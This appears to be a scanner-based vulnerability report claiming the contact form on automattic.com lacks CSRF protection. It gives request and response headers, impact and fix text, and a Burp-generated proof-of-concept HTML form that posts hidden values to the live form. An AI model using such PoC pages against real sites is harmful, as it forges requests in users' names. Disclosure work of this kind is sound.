HTML form without CSRF protection

HTML form without CSRF protection Vulnerability description Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. This vulnerability affects /contact. Attack details Form action: http://automattic.com/contact/ Form method: POST Form inputs: your_name [Text] your_email [Text] blog_url [Text] subject [Text] message [TextArea] submit [Submit] View HTTP headers Request GET /contact/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://automattic.com/contact/ Acunetix-Aspect: enabled Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c Acunetix-Aspect-Queries: filelist;aspectalerts Host: automattic.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* Response HTTP/1.1 200 OK Server: nginx Date: Thu, 17 Apr 2014 16:08:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Vary: Accept-Encoding Last-Modified: Thu, 17 Apr 2014 16:08:19 GMT Cache-Control: max-age=272, must-revalidate X-nananana: Batcache Vary: Cookie X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-Pingback: http://automattic.com/xmlrpc.php Link: <http://wp.me/Pe4R-7>; rel=shortlink Original-Content-Encoding: gzip Content-Length: 16613 View HTML response Launch the attack with HTTP Editor Retest alert(s) Mark this alert as a false positive The impact of this vulnerability An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application. How to fix this vulnerability Check if this form requires CSRF protection and implement CSRF countermeasures if necessary. poc- <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://automattic.com/contact/" method="POST"> <input type="hidden" name="your&#95;name" value="saddsa" /> <input type="hidden" name="your&#95;email" value="sdasad&#64;sg&#46;com" /> <input type="hidden" name="blog&#95;url" value="http&#58;&#47;&#47;www&#46;google&#46;co&#46;in&#47;" /> <input type="hidden" name="subject" value="sadsa" /> <input type="hidden" name="message" value="hello" /> <input type="hidden" name="submit" value="Send" /> <input type="submit" value="Submit form" /> </form> </body> </html>